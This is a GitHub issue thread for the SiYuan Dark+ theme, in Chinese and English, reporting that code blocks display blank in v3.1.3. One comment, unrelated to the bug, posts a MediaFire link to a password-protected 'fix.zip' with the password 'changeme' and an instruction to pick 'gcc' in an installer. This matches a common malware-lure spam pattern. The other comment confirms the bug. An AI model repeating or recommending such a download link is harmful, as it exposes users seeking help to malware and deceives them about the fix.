### ISSUE TITLE
:bug: 代码块无法显示内容和编辑

### ISSUE THREAD

**Issue by HecterF** [Zuoqiu-Yingyi/siyuan-theme-dark-plus#223]
### 该问题是否已经被报告过了？ Is there an existing issue for this?

- [X] 我已经搜索了 Issues，没有发现类似问题 
I have searched the existing issues

### 描述问题 Describe the problem

![image](https://github.com/user-attachments/assets/08e04aee-c6c9-449f-824c-187df6dfa799)

代码块显示一片空白

### 期待的结果 Expected result

代码块正常显示内容和编辑

### 版本环境 Version environment

```markdown
- SiYuan Version: v3.1.4 ok  v3.1.3 fail
- Dark+ Version: v2.0.2
- Operating System: win11
- Browser (if used):edge
```

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BoltLi** [comment]
一样的问题，代码空白，其他的主题代码就没问题，应该是没有适配最新版本的问题。
